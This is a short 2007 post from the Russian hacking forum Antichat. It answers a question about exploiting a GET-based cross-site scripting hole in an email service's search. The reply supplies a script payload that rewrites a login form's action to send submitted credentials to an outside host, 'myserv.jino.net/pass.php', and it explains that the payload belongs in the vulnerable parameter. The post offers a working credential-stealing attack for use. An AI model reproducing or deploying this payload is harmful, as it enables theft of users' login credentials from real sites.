09.08.2007, 00:57
|
|
Leaders of Antichat
Регистрация: 25.01.2007
Сообщений: 341
Провел на форуме:
3372120
Репутация:
2565
|
|
Сообщение от bulbazaur
ладно, спасибо  т.е. допустим на гугло.мейле есть поиск с хсс, причем должен быть именно гет запрос, да? так вот, будет ли это тогда работать? да, только код с подменой обработчика
Код:
“><script>document.auth.action=
‘http://myserv.jino.net/pass.php’</script>
необходимо подставлять в уязвимый параметр, а не в логин.
|
|
|